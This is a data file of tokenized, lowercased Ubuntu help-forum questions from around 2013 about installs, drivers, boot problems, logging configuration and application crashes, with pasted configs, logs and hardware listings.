394729	unable to install ubuntu - bootable usb	i had an old laptop , installed ubuntu ( do n't remember version ) on it with bootable usb . nothing went wrong . however i changed the old laptop with a new one ( mostly gaming reasons ) and ubuntu is simply failing to install . i tried 12.04 , but instead of the `` install alongside windows 7 '' ( which i did on my previous laptop ) , it gave me `` install inside windows 7 '' which will open a wubi ( the thing i wanted to avoid ) . after trying several times with older versions ( 11.04 gave me only replace and `` other options '' which i 'm not sure how to use it and i would like to avoid ) i finally gave up and tried with wubi ... .only to see it wo n't work , with any version . it gaves me the `` nonetype object has no attribuite get_info '' error , with every iso i tried from 12.04 to 13.10 ( downloaded from mirrors and torrents too ! ) . can anyone provide me an iso with the install alongside thing ? or at least help me ? i 'm not familiar with shrinking , resising and doing magic with partitions so i would like to avoid that .
394730	can i get my samsung galaxy discover driver from the repos ? i cant seem to find it	just wanting to know where to look for my driver , cause ubuntu 10.04 dosent reconize it . when i plug my phone into computer , all it will do is charge . im wanting to sync with ubuntu one and upload pictures and apps .
394733	making the inactive icons from the launched black and white ?	i would like the icons of running apps to be in colors as they are now , but the inactive ones to be black and white ? the idea is that it will be easier for the eyes to know which one are running and which are not . also would look better . is there an easy way to do this ?
394735	failed installation	i 'm installing ubuntu as my first os on my laptop from a bootable dvd , now it all goes good , but at about 90ish % my disc starts making a weird noise and the installation crashes.now i do n't know what my problem here is , so please help !
394737	how to be superuser in ubuntu 13.10	to install a .run file i am using su - to be super user in terminal , it asks for password but on entering password it show following error su : authentication failure
394746	apt-get purge , install nginx ; reports success but not installed ( 12.04 )	after removing nginx , i re-installed it with sudo apt-get install nginx . output indicated that the installation was successful . but there 's no directory /etc/nginx and sudo service nginx start fails because it ca n't read the config file . how can i fix this ?
394751	old entries in dpkg.log after ubuntu re-installtion	i recently re-installed ubuntu 12.04 . today i took a look at the system file viewer and saw entries in dpkg.log from 2012 . was the system uninstalled incompletely ?
394753	single boot macbook 6,1 12.04.3 lts post install questions	i 'm not quite sure how to check if my fans are running right . 2.i 've installed the mactel ppa , but i 'm not sure if i 've installed everything right . my graphics card is not recognized under details and i have installed the proprietary tested drivers . i have also run sudo apt-get install nvidia-current long efi boot is annoying . i saw something a long time ago about re-blessing the hd but i do n't remember how . cant seem to get the function keys to work at all . -- i 'm sort of new but have been playing with all types of linux for years , these are just some things i 've recently run into . -- i want a stable , single boot system i can rely on for work . i know it 's an old computer , but i work in oit and i maintain it well . -- if you need anymore information . please ask . ect/default/grub grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash reboot=pci nomodeset cideo+uvesafb : mode_option=1280x800-24 , mtrr=3 , scroll=ywrap '' grub_cmdline_linux= '' '' system information sudo gedit /etc/default/grub macbook6,1 uname -a linux xxnamexx 3.8.0-34-generic # 49~precise1-ubuntu smp wed nov 13 18:05:00 utc 2013 x86_64 x86_64 x86_64 gnu/linux lsusb bus 001 device 002 : id 05ac:8507 apple , inc. built-in isight bus 003 device 002 : id 05ac:0236 apple , inc. internal keyboard/trackpad ( ansi ) bus 004 device 002 : id 0a5c:4500 broadcom corp. bcm2046b1 usb 2.0 hub ( part of bcm2046 bluetooth ) bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 005 : id 05ac:8218 apple , inc. bluetooth host controller lspci 00:00.0 host bridge : nvidia corporation mcp79 host bridge ( rev b1 ) 00:00.1 ram memory : nvidia corporation mcp79 memory controller ( rev b1 ) 00:03.0 isa bridge : nvidia corporation mcp79 lpc bridge ( rev b3 ) 00:03.1 ram memory : nvidia corporation mcp79 memory controller ( rev b1 ) 00:03.2 smbus : nvidia corporation mcp79 smbus ( rev b1 ) 00:03.3 ram memory : nvidia corporation mcp79 memory controller ( rev b1 ) 00:03.4 ram memory : nvidia corporation mcp79 memory controller ( rev b1 ) 00:03.5 co-processor : nvidia corporation mcp79 co-processor ( rev b1 ) 00:04.0 usb controller : nvidia corporation mcp79 ohci usb 1.1 controller ( rev b1 ) 00:04.1 usb controller : nvidia corporation mcp79 ehci usb 2.0 controller ( rev b1 ) 00:06.0 usb controller : nvidia corporation mcp79 ohci usb 1.1 controller ( rev b1 ) 00:06.1 usb controller : nvidia corporation mcp79 ehci usb 2.0 controller ( rev b1 ) 00:08.0 audio device : nvidia corporation mcp79 high definition audio ( rev b1 ) 00:09.0 pci bridge : nvidia corporation mcp79 pci bridge ( rev b1 ) 00:0a.0 ethernet controller : nvidia corporation mcp79 ethernet ( rev b1 ) 00:0b.0 sata controller : nvidia corporation mcp79 ahci controller ( rev b1 ) 00:10.0 pci bridge : nvidia corporation mcp79 pci express bridge ( rev b1 ) 00:15.0 pci bridge : nvidia corporation mcp79 pci express bridge ( rev b1 ) 02:00.0 vga compatible controller : nvidia corporation c79 [ geforce 9400m ] ( rev b1 ) 03:00.0 network controller : broadcom corporation bcm43224 802.11a/b/g/n ( rev 01 ) lsmod module size used by bnep 18258 2 rfcomm 47864 0 dm_crypt 23051 1 parport_pc 28284 0 ppdev 17113 0 nvidia 9430169 41 snd_hda_codec_cirrus 24074 1 snd_hda_intel 44339 3 snd_hda_codec 141761 2 snd_hda_codec_cirrus , snd_hda_intel lib80211_crypt_tkip 17390 0 snd_hwdep 13668 1 snd_hda_codec snd_pcm 102477 2 snd_hda_intel , snd_hda_codec snd_seq_midi 13324 0 snd_rawmidi 30417 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi uvcvideo 82214 0 snd_seq 61930 2 snd_seq_midi , snd_seq_midi_event kvm_intel 137899 0 wl 3074618 0 coretemp 13596 0 snd_timer 29989 2 snd_pcm , snd_seq snd_seq_device 14497 3 snd_seq_midi , snd_rawmidi , snd_seq btusb 22431 0 lp 17799 0 kvm 455932 1 kvm_intel drm 287564 2 nvidia parport 46562 3 parport_pc , ppdev , lp snd 69533 15 snd_hda_codec_cirrus , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device cfg80211 525326 1 wl bluetooth 247165 14 bnep , rfcomm , btusb videobuf2_core 40785 1 uvcvideo videodev 130053 2 uvcvideo , videobuf2_core apple_bl 13673 0 i2c_nforce2 13065 0 applesmc 19564 0 joydev 17613 0 shpchp 37201 0 mac_hid 13253 0 bcm5974 17470 0 videobuf2_vmalloc 13056 1 uvcvideo soundcore 12680 1 snd videobuf2_memops 13202 1 videobuf2_vmalloc snd_page_alloc 18798 2 snd_hda_intel , snd_pcm input_polldev 13896 1 applesmc microcode 23017 0 lib80211 14352 2 lib80211_crypt_tkip , wl nls_iso8859_1 12713 1 hid_generic 12540 0 hid_apple 13382 0 usbhid 47346 0 hid 105826 3 hid_generic , hid_apple , usbhid ahci 25879 3 libahci 31606 1 ahci forcedeth 67595 0 cat /proc/cpuinfo processor : 0 vendor_id : genuineintel cpu family : 6 model : 23 model name : intel ( r ) core ( tm ) 2 duo cpu p7550 @ 2.26ghz stepping : 10 microcode : 0xa07 cpu mhz : 798.000 cache size : 3072 kb physical id : 0 siblings : 2 core id : 0 cpu cores : 2 apicid : 0 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good nopl aperfmperf pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm sse4_1 xsave lahf_lm dtherm tpr_shadow vnmi flexpriority bogomips : 4510.32 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : processor : 1 vendor_id : genuineintel cpu family : 6 model : 23 model name : intel ( r ) core ( tm ) 2 duo cpu p7550 @ 2.26ghz stepping : 10 microcode : 0xa07 cpu mhz : 798.000 cache size : 3072 kb physical id : 0 siblings : 2 core id : 1 cpu cores : 2 apicid : 1 initial apicid : 1 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good nopl aperfmperf pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm sse4_1 xsave lahf_lm dtherm tpr_shadow vnmi flexpriority bogomips : 4510.32 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management :
394754	how can i grep below logs with client ip and save each client logs in a different file ?	éş need to save all the logs but here logs are combined together . so i need to grep the logs with ipadres and client id , and each ip 's should be saved in a different file . i am using rsyslog . so how can i grep below logs with client ip and save each client logs in each file ? my rsyslog.conf ( clientl server ) : # /etc/rsyslog.conf configuration file for rsyslog . # # for more information see # /usr/share/doc/rsyslog-doc/html/rsyslog_conf.html # # default logging rules can be found in /etc/rsyslog.d/50-default.conf # # # # # # # # # # # # # # # # # # # # # modules # # # # # # # # # # # # # # # # # # # # # $ modload imuxsock # provides support for local system logging $ modload imklog # provides kernel logging support # $ modload immark # provides -- mark -- message capability # provides udp syslog reception # $ modload imudp # $ udpserverrun 514 # provides tcp syslog reception # $ modload imtcp # $ inputtcpserverrun 514 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # global directives # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # use traditional timestamp format . # to enable high precision timestamps , comment out the following line . # $ actionfiledefaulttemplate rsyslog_traditionalfileformat # filter duplicated messages $ repeatedmsgreduction on # # set the default permissions for all log files . # $ fileowner syslog $ filegroup adm $ filecreatemode 0640 $ dircreatemode 0755 $ umask 0022 $ privdroptouser syslog $ privdroptogroup syslog # # where to place spool and state files # $ workdirectory /var/spool/rsyslog # # include all config files in /etc/rsyslog.d/ # $ includeconfig /etc/rsyslog.d/*.conf \ # provides udp syslog reception $ modload imudp $ udpserverrun 514 \ # provides tcp syslog reception $ modload imtcp $ inputtcpserverrun 514 $ modload imuxsock $ modload imklog # provides udp forwarding . the ip is the server 's ip address * . * @ 192.168.1.84:514 # provides tcp forwarding . but the current server runs on udp # * . * @ @ 192.168.1.27:514 $ template precise , '' % syslogpriority % , % syslogfacility % , % timegenerated % , % hostname % , % syslogtag % , % msg % \n '' $ actionfiledefaulttemplate precise $ actionfiledefaulttemplate rsyslog_traditionalfileformat root @ ubuntu : /etc # my central server =================== # /etc/rsyslog.conf configuration file for rsyslog . # # for more information see # /usr/share/doc/rsyslog-doc/html/rsyslog_conf.html # # default logging rules can be found in /etc/rsyslog.d/50-default.conf # # # # # # # # # # # # # # # # # # # # # modules # # # # # # # # # # # # # # # # # # # # # $ modload imuxsock # provides support for local system logging $ modload imklog # provides kernel logging support ( previously done by rklogd ) # $ modload immark # provides -- mark -- message capability # provides udp syslog reception $ modload imudp $ udpserverrun 514 # provides tcp syslog reception # $ modload imtcp # $ inputtcpserverrun 514 \ # provides udp syslog reception $ modload imudp $ udpserverrun 514 \ # provides tcp syslog reception $ modload imtcp $ inputtcpserverrun 514 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # global directives # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # use traditional timestamp format . # to enable high precision timestamps , comment out the following line . # $ actionfiledefaulttemplate rsyslog_traditionalfileformat # filter duplicated messages $ repeatedmsgreduction on # # set the default permissions for all log files . # $ fileowner syslog $ filegroup adm $ filecreatemode 0640 $ dircreatemode 0755 $ umask 0022 $ privdroptouser syslog $ privdroptogroup syslog # # where to place spool files # $ workdirectory /var/spool/rsyslog # # include all config files in /etc/rsyslog.d/ # $ includeconfig /etc/rsyslog.d/*.conf $ modload imudp # loads the udp module $ udpserverrun 514 # defines what port to listen on $ escapecontrolcharactersonreceive off # prevents rsyslog from turning tab into # 011 $ template precise , '' % syslogpriority % , % syslogfacility % , % timegenerated % , % hostname % , % syslogtag % , % msg % \n '' $ actionfiledefaulttemplate precise $ actionfiledefaulttemplate rsyslog_traditionalfileformat local1 . * /var/log/sadon.log # specifies that all messages for facility `` local1 '' get written to wowza log file dec 12 22:26:13 cloud1 proxy 100.100.1.1 100.100.1.1 12/dec/2013/16/56/13 get /favicon.ico http/1.0 412 - mozilla/5.0 % 20 % 28x11 % 3b % 20linux % 20x86_64 % 29 % 20applewebkit/537.31 % 20 % 28khtml % 2c % 20like % 20gecko % 29 % 20chrome/26.0.1410.63 % 20safari/537.31 - - 7 - txb786a0cbd4ca4286b6169c5510e4e921 - 0.0002 - dec 12 22:26:58 cloud1 proxy 100.100.1.17 100.100.1.17 12/dec/2013/16/56/58 get /v1/auth_4c36d514-afc9-4f2e-a017-6476df84f695/a/a.jpg http/1.0 200 - mozilla/5.0 % 20 % 28x11 % 3b % 20linux % 20i686 % 29 % 20applewebkit/537.36 % 20 % 28khtml % 2c % 20like % 20gecko % 29 % 20chrome/31.0.1650.63 % 20safari/537.36 - - 605868 - txd23377ef34de44e081c56dd07d3f66fa - 2.6376 - dec 12 22:26:58 cloud1 proxy 100.100.1.17 100.100.1.17 12/dec/2013/16/56/58 get /favicon.ico http/1.0 412 - mozilla/5.0 % 20 % 28x11 % 3b % 20linux % 20i686 % 29 % 20applewebkit/537.36 % 20 % 28khtml % 2c % 20like % 20gecko % 29 % 20chrome/31.0.1650.63 % 20safari/537.36 - - 7 - tx20934ca545654f729d9b6af12b244f2a - 0.0002 - dec 12 22:59:29 cloud1 proxy 100.100.176.22 100.100.176.22 12/dec/2013/17/29/29 get / http/1.0 404 - - - - 70 - tx5e04cadd1ba145adaffebafbb395fd1b - 0.0003 - dec 13 02:47:55 cloud1 proxy 121.56.217.206 121.56.217.206 12/dec/2013/21/17/55 get http % 253a//www.baidu.com/robots.txt http/1.0 404 - mozilla/4.0 % 20 % 28compatible % 3b % 20win32 % 3b % 20winhttp.winhttprequest.5 % 29 - - 70 - tx4a7e8abf3b2b43d29c208258ce8399c8 - 0.0003 - dec 13 03:25:57 cloud1 proxy 100.100.8.235 100.100.8.235 12/dec/2013/21/55/57 head / http/1.0 404 - - - - - - tx9f28783556494fc6b58eeb6ae31d352a - 0.0004 - dec 13 05:13:43 cloud1 proxy 100.100.14.88 100.100.14.88 12/dec/2013/23/43/43 get http % 253a//www.qq.com/ http/1.0 404 - mozilla/4.0 % 20 % 28compatible % 3b % 20msie % 204.01 % 3b % 20windows % 2098 % 29 - - 70 - txc564961a15184049812d0a5026f8c694 - 0.0003 - dec 13 07:07:16 cloud1 proxy 100.100.14.88 100.100.14.88 13/dec/2013/01/37/16 get http % 253a//www.qq.com/ http/1.0 404 - mozilla/4.0 % 20 % 28compatible % 3b % 20msie % 204.01 % 3b % 20windows % 2098 % 29 - - 70 - tx835d0cff6cc04f5e9d1e9353a16ccc7b - 0.0003 - dec 13 08:29:53 cloud1 proxy sigterm received dec 13 08:29:53 cloud1 proxy exited
394756	vim not working	i m trying make a file using vim but the error is coming vim is not installed . when i have tried installing it by command sudo get-apt install vim it 's showing error . i tried using vi it is working properly
394760	gnome 3.10 app-folder-categories not working	i have installed ubuntu gnome 13.10 , and i have upgraded gnome 3.8 to 3.10 through official ppa ( ppa : gnome3-team/gnome3-next ) . now when i want to make new folders for sorting applications in main menu , the folders are not visible . i used dconf ( org- > gnome- > shell ) to edit app-folder-categories which contains folders from main menu . i have read somewhere that gnome 3.10 will have graphical way to add folders in main menu , but i ca n't seem to find it . does anyone know how to do it ?
394762	acer emachines screen jumbled	i have an acer emachines el321-18se that uses an nvidia geforce graphics . i recently installe ubuntu 13.04 and from time to time the screen gets jumbled and distorted . i try to recreate the issue but ca n't seem to do it . when it happens i have to do a hard restart of the computer as i cant use the mouse or keyboard , not sure if its because the screen has gone out or it freezes these devices . if there was music playing it stops so i am assuming it freezes everything . at times when it happens and i shutdown and restart ( i have skype installed ) , i see the accept end user licence come for skype and i have to re enter my password . i am assuming that it has updated the software and that could have caused the problem . i also noticed that within a couple weeks after installing the os , sometimes while installing other software the same issue happens , also it used to happen when i open the launcher but seems to have stopped doing that when i open it . it still happens with the skype updates and from time to time when i install software . are there any such known bugs and is anybody else known to have experienced this ? i can not get a screenshot as the computer is totally unresponsive when this happens .
394766	additional drivers for nvidia graphics card can not be installed	my laptop runs on ubuntu 13.10 and has nvidia gt 520mx discrete graphics . but additional drivers in software & updates shows that 'no additional drivers are available ' . why is it so ? how can i install the correct driver ?
394771	how many physical processors does ubuntu support ?	how many physical processors does ubuntu support ? i have a 4 socket server mainboard with 4 dual core amd opterons . will ubuntu support all 8 processors . i also have plans to upgrade to 6 core opterons making this a 24 processor machine . any problem supporting this many processors ? thank you .
394773	ralink 3070 in ubuntu 12.04 over android ( through usb otg )	im trying to install a wi-fi dongle by usb otg in my samsung galaxy s3 lte . with lsusb i have n't have had problems , but when i type iwconfig it does n't show the interface . i have used debă­an kit to install ubuntu in android . debian kit | free software downloads at sourceforge.net any suggestions ? how can i install drivers from ralink`s website ? thanks for reply and greetings .
394778	could not copy the folder with .txt file in it to another folder	i 'm just trying to copy the folder present in /home/black/desktop/linux to another folder present in /home/black/desktop/ubuntu now what i did.cd /home/black/desktop/linux now am there in linux folder in desktop . then : cp -r linux/ /home/black/desktop/ubuntu no such file or directory between when i am copying the content from linux folder like .txt file to another directory i can do that smoothly . so y use -r when copying folder ?
394779	how to install driver for rt5370 on ubuntu 12.04 ?	i am trying to install a driver for my wireless adapter ralink rt5370 . i 've downloaded the driver for linux from this website . then i have modified : in os/linux/config.mk : 'has_wpa_supplicant=y ' , 'has_native_wpa_supplicant_support=y ' and 'wflags += -dconfig_sta_support ' # # ( removed `` -ddbg '' from the line ) in makefile : ifeq ( $ ( chipset ) , ) chipset = 5370 endif ( instead of 5572 5370 etc . ) then i ran the following commands : sudo make & & sudo make install sudo modprobe rt5572sta but it still does n't work after a reboot . rt5572sta was the only module that was proposed for modprobe . i am on 12.04 . $ lsusb ... ... ralink technology corp. rt5370 wireless adapter ... $ lsmod ... rt5572sta 739308 0 ... $ uname -r -m 3.2.0-23-generic-pae i686 does anyone know how to make it work ?
394781	accidentally deleted usr/share/x11/xorg.conf.d	because there 's where tochpad/mouse behaviour is stored , and connecting a usb mouse recently has messed up my touchpad settings . so i thought why not delete the settings , they 'll get restored . apparently not . now the problem is , neither keyboard nor mouse are working , but everything else seems to work ( screen resolution is correct , clock is ticking ) . what can i do to make this work again ? edit : i 'm on ubuntu 13.10
394787	problem with hard disk ( i think ... )	in the last year i had a problem with my notebook : sometimes when i push the power button it starts ( i hear the fan ) but nothing appears on the screen , i have to hit it on the bottom to make it start.. in the last month the problem is changed : now it starts every time without need of hitting it but it shuts down without any apparent reason and then immediately reboots . this happens more frequently when the notebook is just turned on or when is turned on from a while but i am not using it . in addition if i instead boot windows ( installed on another partition ) the problem disappears ... my hypothesis is that the problem is in the hard disk , so i came to the questions : how can i verify my hypothesis ? is it plausible ? since windows in in sda2 , ubuntu in sda5 and sda3 contains only data do you think it is a good idea to move ubuntu to the left ( resizing sda3 ) and then leaving the last part of the disk ( where probably there is the problem ) empty ( in a new partition ) ?
394789	installing ubuntu from iso on hdd doesnt work	hey guys iǘe got a question i used thistutorial from this side to install ubuntu directly from hard disk using grub but when i select the entry i get an error message saying `` no such file '' and `` you have to load kernel first '' so what am i doing wrong i doubled checked the exact location of the iso both on the hdd and in the cfg text any ideas thanks in advance edit ok so the grub entry is this one '' menuentry `` ubuntu iso '' { set isofile= '' /boot/iso/ubuntu13.iso '' loopback loop ( hd0,5 ) $ isofile linux ( loop ) /casper/vmlinuz boot=casper iso-scan/filename= $ isofile noprompt noeject initrd ( loop ) /casper/initrd.lz '' the iso is located in the `` filesystems '' boot directory where grub is at . i am fairly new to linux so i hope that´s enough info if not just tell me .
394793	network manager and sutdown not working	most of the functionality have stopped working after i changed the permission of lib folder . network manager , shutdown/restart , dvd drive everything stopped working . can some one lead me to the right path from disaster ?
394795	how to run gerris on ubuntu 13.10 ?	i installed gerris on ubuntu 13.10 . how can i run matlab python or gerris ? please help me .
394796	gparted data recovery after closed move-left	refreshing my kubuntu screen , i must have hit the return key too often and closed gparted while it was doing a move-left that is : from : | sda1 | unallocated | sda3 | | 60gb ntfs | 71.8gb free | 141gb ext3 | to : | sda1 | sda3 | | 60gb ntfs | 216gb ext3 | the closeevent ( ) came from the kubuntu desktop . about 10 % of the data has been moved left . is there any way to recover any data ? to figure out which byte was last moved ? is there a log file ?
394797	does ubuntu have a program installer like windows msi ?	i am installing java on ububtu 13.10 . i know that there are 2 option to install jvm , manually or via apt command . but i am asking to myself , there is an ubuntu equivalent of windows msi or exe ( i click and wizard do anything ) ?
394798	no such file or directory wubi-12.04.1-rev273.log	i just downloaded ubuntu 12.04 and ran the wubi.exe file . the installation process started however this message pops up : no such file or directory . for more information , please see log file : c : \users\annalin\appdata\local\temp\wubi-12.04.1-rev273.log what should i do now ? have a look at the log file here .
394801	installing kubuntu from ubuntu dvd ?	i want to install kubuntu 13.10 , but i just have ubuntu 13.10 cd . can i install kubuntu with some method ? i know about install kubuntu-desktop after installation , but should be another way ...
394803	what is xorg-server process ?	what is the `` real '' process that runs when xorg-server is running ? are there two different processes for 32 and 64bit versions ?
394806	ubuntu 13.10 lock-up with asus blu ray drive	i have just built a system as follows : asrock z87 extreme6/ac -- - intel core i7-4770 -- - 16gb ( 2 x 8gb ) hyperx blu black ddr3 1600mhz dimm xmp cl10 -- - samsung 250gb 840 evo series sata 6gb/s 2.5 '' solid state drive -- - corsair 760w ax760 80plus platinum high performance psu -- - asus 12x bd-r reader 16x dvdrw 48x cd-r black retail drive ( bc-12d2ht ) i could not get the live disk ( either as usb or dvd ) to boot so had to build the ssd on another machine . then pc would lock occasionally when logging on after a reboot . very frustrating ! however , i have just tried to read a dvd and the machine locked up . so disconnected the dvd drive and everything working ok and can now boot live cd . so the problem was the dvd drive all along . is this a problem with ubuntu 13.10 or a faulty drive ? how do i debug ? anyone else using this drive ?
394810	latest ubuntu lts 12.04 updates killed my x server & samba setups under mythtv ( again ) 2013-12-23	i 'm guessing it 's the nvidia drivers again with the x , that 's the thing that gets screwed up after updates 3 or 4 times a year since the new update schedule started . tried all the things that fixed it in the past , no help this time , been at it all morning ( 5 hours so far ) . what does seem to have some effect is : the following seems to create run on text , no lf or cr why ? shows ok in the browser ( firefox ) sudo jockey-text -e xorg : nvidia_304 sudo nvidia-xconfig sudo nvidia-settings sudo jockey-text -e xorg : nvidia_304 sudo reboot sudo startx here x comes up without any gui , blank x screen with background . that 's the best i seem to be able to get . holding shift during boot does nothing , it used to show the startup prompts from grub . how do we get them back now ? i 'm guess it 's changed yet again . if i could get to the normal startup screen i have several guis loaded and i could try another instead of the default . some startup details : x.org x server 1.11.3 release date : 2011-12-16 x protocol version 11 , revision 0 build operating system : linux 2.6.42-37-generic i686 ubuntu current operating system : linux bbc-server 3.2.0-54-generic # 82-ubuntu smp tue sep 10 20:09:12 utc 2013 i686 kernel command line : boot_image=/boot/vmlinuz-3.2.0-54-generic root=uuid=3e6e688b-41a0-437f-840e-1bd1e33fc483 ro text build date : 16 october 2013 04:45:22pm xorg-server 2:1.11.4-0ubuntu10.14 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.24.4 ... markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file : `` /var/log/xorg.0.log '' , time : mon dec 23 10:32:22 2013 ( == ) using config file : `` /etc/x11/xorg.conf '' ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' at this port x is up , but no guis or anything else seem to run . i 'm getting there via putty from close by windowsxp machine . so i opened another terminal to try to get the gui to do anything : bcw @ bbc-server : ~ $ sudo lightdm & [ 1 ] 3173 bcw @ bbc-server : ~ $ ps pid tty time cmd 3067 pts/4 00:00:00 bash 3174 pts/4 00:00:00 ps [ 1 ] + stopped sudo lightdm # so no gui . *** merry christmas *** ; )
394811	unable to locate package error when installing matlab 2013a	10 yesterday i downloaded matlab r2013a from university website but it says elif @ ubuntu : ~ $ sudo apt-get install mathworks_r2013a reading package lists ... done building dependency tree reading state information ... done e : unable to locate package mathworks_r2013a elif @ ubuntu : ~ $ i did everthing that is written in websites how can i fixed the problem ? thanks ...
394812	ca n't mount truecrypt ntfs volume so i can write to it	i have ntfs-3g installed . i 'm with ubuntu 13.10 truecrypt mounts the encrypted volume just fine but it can only be read when i do sudo mkdir or sudo touch i get '' can not create directory ‘test’ : read-only file system '' so how i should mount this ntfs volume so i can write to it ?
394813	access specific folder on ubuntu virtualbox from windows host	need to access /etc folder which resides on ubuntu guest ( virtualbox ) from windows 7 host . vm working on nat , guest additions installed along with smb . any ideas , gentlemen 's ? shared folders option in virtualbox seems useless in this case , huh ?
394814	how to edit resovle.conf on my own ?	i am doing all the networking manually . for example , if i want to connect to a network using dhcp i change the dhclient script file then i read my script then add the ip 's using ip command . it all working fine . however , since i am doing every thing manually the resove.conf file stays empty . how can i edit than . is it by opening the file and edit ?
394819	ubuntu 13.10 does not shutdown	when i try to shut down ubuntu just little times it shuts down properly , but most of times it blocks on the page in which there is wrote 'ubuntu ' in the middle and the sequence of points under it . in other questions people uses cairo , but i do n't , and i 've found this question but the solution in for ubuntu 12.04 , can i use it either on 13.10 ?
394820	banshee stops working after 1 song	i ca n't find real reason banshee stops playing and crashes after 1 song ( sometimes after 2/3/4 songs , but 90 % after 1 song and on fist few seconds of the 2nd song ) . shuffle on/off does n't really matter . i tried to sudo apt-get purge remove banshee rm -rf ~/.config/banshee-1 sudo apt-get install banshee but still have same problem . banshee -- debug output : normal song ( 1st ) : [ 1 debug 01:25:56.790 ] ( libbanshee : player ) bp_stop : setting state to gst_state_null [ 1 debug 01:25:56.826 ] player state change : playing - > idle [ 1 debug 01:25:56.828 ] player state change : idle - > loading [ 1 debug 01:25:56.924 ] player state change : loading - > loaded [ 1 debug 01:25:56.926 ] ( libbanshee : player ) [ gapless ] triggering track-change signal [ 1 debug 01:25:56.927 ] player state change : loaded - > playing [ 1 debug 01:25:57.942 ] trackinfodisplay renderanimation : 32.00 fps 2nd song : [ 1 debug 01:26:02.151 ] querying model for track to play in song : next mode [ 1 debug 01:26:02.162 ] ( libbanshee : player ) bp_stop : setting state to gst_state_null [ 1 debug 01:26:02.202 ] player state change : playing - > idle [ 1 debug 01:26:02.204 ] player state change : idle - > loading [ 1 debug 01:26:02.317 ] player state change : loading - > loaded [ 1 debug 01:26:02.319 ] ( libbanshee : player ) [ gapless ] triggering track-change signal [ 1 debug 01:26:02.327 ] opening http : //en.wikipedia.org/wiki/beck [ 1 info 01:26:02.352 ] uncached artwork size 37 requested [ 1 debug 01:26:02.353 ] player state change : loaded - > playing stacktrace : at ( wrapper managed-to-native ) gtk.application.gtk_main ( ) < il 0x0000e , 0xffffffff > at gtk.application.run ( ) < il 0x00000 , 0x0000b > at banshee.gui.gtkbaseclient.run ( ) < il 0x0000d , 0x0005f > at banshee.gui.gtkbaseclient.startup ( ) < il 0x0000f , 0x00049 > at hyena.gui.cleanroomstartup.startup ( hyena.gui.cleanroomstartup/startupinvocationhandler ) < il 0x00045 , 0x0008e > at banshee.gui.gtkbaseclient.startup < t > ( ) < il 0x00036 , 0x0006b > at banshee.gui.gtkbaseclient.startup < t > ( string [ ] ) < il 0x0004d , 0x000ff > at nereid.client.main ( string [ ] ) < il 0x00001 , 0x00017 > at ( wrapper runtime-invoke ) < module > .runtime_invoke_void_object ( object , intptr , intptr , intptr ) < il 0x00050 , 0xffffffff > at ( wrapper managed-to-native ) system.appdomain.executeassembly ( system.appdomain , system.reflection.assembly , string [ ] ) < il 0x0001b , 0xffffffff > at system.appdomain.executeassemblyinternal ( system.reflection.assembly , string [ ] ) < il 0x0002f , 0x00047 > at system.appdomain.executeassembly ( string , system.security.policy.evidence , string [ ] ) < il 0x0000b , 0x00037 > at ( wrapper remoting-invoke-with-check ) system.appdomain.executeassembly ( string , system.security.policy.evidence , string [ ] ) < il 0x0003b , 0xffffffff > at system.appdomain.executeassembly ( string ) < il 0x00004 , 0x0001f > at ( wrapper remoting-invoke-with-check ) system.appdomain.executeassembly ( string ) < il 0x00039 , 0xffffffff > at booter.booter.bootclient ( string ) < il 0x00024 , 0x0006b > at booter.booter.main ( ) < il 0x000f6 , 0x001db > at ( wrapper runtime-invoke ) object.runtime_invoke_void ( object , intptr , intptr , intptr ) < il 0x0004c , 0xffffffff > native stacktrace : banshee ( ) [ 0x4961e9 ] banshee ( ) [ 0x4e6d1f ] banshee ( ) [ 0x41dcb7 ] /lib/x86_64-linux-gnu/libpthread.so.0 ( +0xfbd0 ) [ 0x7ffd5f623bd0 ] debug info from gdb : could not attach to process . if your uid matches the uid of the target process , check the setting of /proc/sys/kernel/yama/ptrace_scope , or try again as the root user . for more details , see /etc/sysctl.d/10-ptrace.conf ptrace : operation not permitted . no threads . ================================================================= got a sigsegv while executing native code . this usually indicates a fatal error in the mono runtime or one of the native libraries used by your application . ================================================================= aborted sw : # uname -a linux drey-isp-note 3.8.0-19-generic # 29-ubuntu smp wed apr 17 18:16:28 utc 2013 x86_64 x86_64 x86_64 gnu/linux # cat /etc/issue linux mint 15 olivia \n \l hw : asus k56b
